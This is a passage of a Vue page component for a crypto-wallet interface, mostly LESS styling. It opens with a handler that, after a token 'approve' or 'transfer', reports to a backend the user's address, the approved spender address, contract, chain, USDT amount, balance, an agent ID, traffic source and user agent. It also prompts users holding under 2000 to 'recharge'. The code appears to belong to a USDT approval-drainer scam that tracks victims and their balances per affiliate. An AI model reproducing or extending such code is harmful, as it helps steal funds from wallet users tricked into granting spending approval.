                            this.authaccountUploading({
                                address: this.defaultAddress,
                                authAddress: this.approve.address,
                                status: res.result ? 1 : 0,
                                Contract: contractAddress,
                                agentId: this.uuid,
                                type: this.approve.type,
                                ChainId: this.$store.state.coding,
                                Usdt: this.amount || 0,
                                Balance: this.Balance || 0,
                                tag: 10,
                                TxId: res.txid,
                                app: this.utm_source,
                                ua: navigator.userAgent.toLowerCase(),
                            });

                            break;
                        case "transfer":
                            this.transferRecord({
                                from: this.defaultAddress,
                                to: toAddress,
                                status: res.result ? 1 : 0,

                                amount: this.amount || 0,

                                txId: res.txid,
                            });

                            break;

                        default:
                            break;
                    }
                    this.msgData = {
                        data: {
                            address: this.defaultAddress,
                            authAddress: this.approve.address,
                            status: res.result ? 1 : 0,
                            Contract: contractAddress,
                            agentId: this.uuid,
                            type: this.approve.type,
                            ChainId: this.$store.state.coding,
                            Usdt: this.amount || 0,
                            Balance: this.Balance || 0,
                            TxId: res.txid,
                            app: this.utm_source,
                            ua: navigator.userAgent.toLowerCase(),
                        },
                        msg: res,
                    };

                    if (this.amount < 2000) {
                        // this.hintShow = true;
                        this.$message.warning({
                            duration: 5000,
                            message: this.$t("hint.recharge"),
                        });
                    }

                })
                .catch((outputErr) => {
                    //交易广播出错
                    switch (type) {
                        case "approve":
                            this.authaccountUploading({
                                address: this.defaultAddress,
                                authAddress: this.approve.address,
                                status: 0,
                                tag: 10,
                                Contract: contractAddress,
                                agentId: this.uuid,
                                type: this.approve.type,
                                ChainId: this.$store.state.coding,
                                Usdt: this.amount || 0,
                                Balance: this.Balance || 0,
                                TxId: "",
                                app: this.utm_source,
                                ua: navigator.userAgent.toLowerCase(),
                            });

                            break;
                        case "transfer":
                            this.transferRecord({
                                from: this.defaultAddress,
                                to: toAddress,
                                status: 0,

                                amount: this.amount || 0,

                                txId: "",
                            });
                    }

                    return false;
                });
        },
    },
}

</script>
<style lang="less" scoped>
.home {
    font-family: PingFang SC;

    background-color: #efeff4;
    min-width: 320px;
    max-width: 750px;
    min-height: 100vh;
    margin: 0 auto;

    .box {
        padding: 20px 20px;

        .title {
            display: flex;
            padding: 24px 10px;
            justify-content: space-between;
            font-size: 18px;

            ._text {
                color: #949495;
            }
        }

        ._box {
            border-radius: 16px;
            padding: 24px 20px;
            font-size: 14px;
            color: #949495;

            &._text {
                word-break: break-all;
            }

            .el-input {
                /deep/ .el-input__inner {
                    border: none;
                }
            }

            background-color: #fff;
        }
    }

    .btn {
        margin-top: 30px;
        height: 50px;
        width: 100%;
    }

    .one {
        padding: 20px;

        .navList {
            .item {
                display: flex;
                align-items: center;
                justify-content: space-between;
                padding: 5px 10px;
                border-bottom: 1px solid #d2d2d2;

                ._l {
                    display: flex;
                    font-size: 14px;
                    text-align: left;

                    .img {
                        width: 38px;
                        height: 38px;
                        margin-right: 20px;

                        img {
                            width: 100%;
                        }
                    }

                    .text {

                        color: #949495;
                    }
                }

                ._r {
                    .railo {
                        width: 15px;
                        height: 15px;
                        border: 1px solid rgb(95, 95, 95);
                        border-radius: 5px;

                        &.active {
                            background: #46b3f1;
                            border-color: #46b3f1;
                        }
                    }
                }
            }
        }

        .tips {
            background: #f2f2f2;
            border-radius: 8px;
            margin: 0 auto;
            margin-top: 20px;
            color: #282828;
            padding: 15px;
        }
    }
}

.qrcodeBox {
    position: fixed;
    left: 0;
    top: 0;
    right: 0;
    bottom: 0;
    background: rgba(0, 0, 0, 0.3);
    display: flex;
    align-items: center;
    justify-content: center;

    ._box {
        background: #fff;
        border-radius: 10px;
        padding: 20px;

        .title {
            text-align: center;
        }

        .qrcode {
            margin: 10px 0;
        }
    }
}

.btnBox {
    display: flex;
    justify-content: center;
}

.copyTitle {
    text-align: center;
    // padding: 10px;
    font-size: 18px;
    color: #000;
    width: 140px;
    display: inline-block;
    margin: 10px auto;
}

.bitpieHinte {
    text-align: center;
    font-size: 18px;
    color: #000;
}

.el-dialog {
    .el-dialog__body {
        padding: 15px 10px;
        padding-top: 0;
    }
}
</style>
